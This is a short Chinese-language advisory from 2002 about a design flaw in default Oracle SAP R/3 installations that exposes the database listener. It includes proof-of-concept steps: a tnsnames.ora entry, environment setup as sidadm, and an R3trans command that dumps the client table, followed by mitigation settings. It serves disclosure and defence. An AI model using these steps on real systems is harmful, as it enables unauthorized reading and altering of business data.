Oracle SAP R/3默认安装存在数据可读漏洞发布时间:2002-04-30 更新时间:2002-04-30 严重程度:高 威胁程度:读取受限文件 错误类型:设计错误 利用方式:服务器模式 受影响系统 All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)详细描述 任意用户可以访问ORACLE 数据库主机的LISTENER端口可以修改/读/写任意SAP数据,攻击者如果获得数据库主机的IP地址和SYSTEM ID,需要使用包嗅探程序,社会工程学,和针对SAP R/3运行sapinfo程序。 根据获得的信息攻击这可以建立本地用户sidadm,构建tnsnames.ora和R3trans运行的环境和运行任意命令。 测试代码 SID.world = (DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (COMMUNITY = sap.world) (PROTOCOL = TCP) (Host = hostname) (Port = 1527) ) ) (CONNECT_DATA = (SID = SID) (GLOBAL_NAME = SID.world) ) ) sidadm> export TNS_ADMIN=$HOME/ sidadm> export ORACLE_HOME=/oracle/SID sidadm> export ORACLE_SID=SID sidadm> export PATH="$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run" sidadm> export dbms_type=oraexport DIR_LIBRARY=/usr/sap/SID/SYS/exe/run sidadm> export dbs_ora_tnsname=SID sidadm> export TNS_ADMIN=/home/sidadm sidadm> cat control export compress=no client=000 # select table where name = T000 select * from t000 sidadm> R3trans control ... sidadm> strings trans.dat ... q 000SAP AG Walldorf DEM [...] q 001Auslieferungsmandant R11 Kundstadt EUR [...] 解决方案 限制端口访问或者使用如下protocol.ora选项配置: tcp.nodelay = true tcp.validnode_checking = yes tcp.invited_nodes = ( hostname, hostname ) 相关信息 Jochen Hein (jochen@jochen.org) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-04/0387.html |
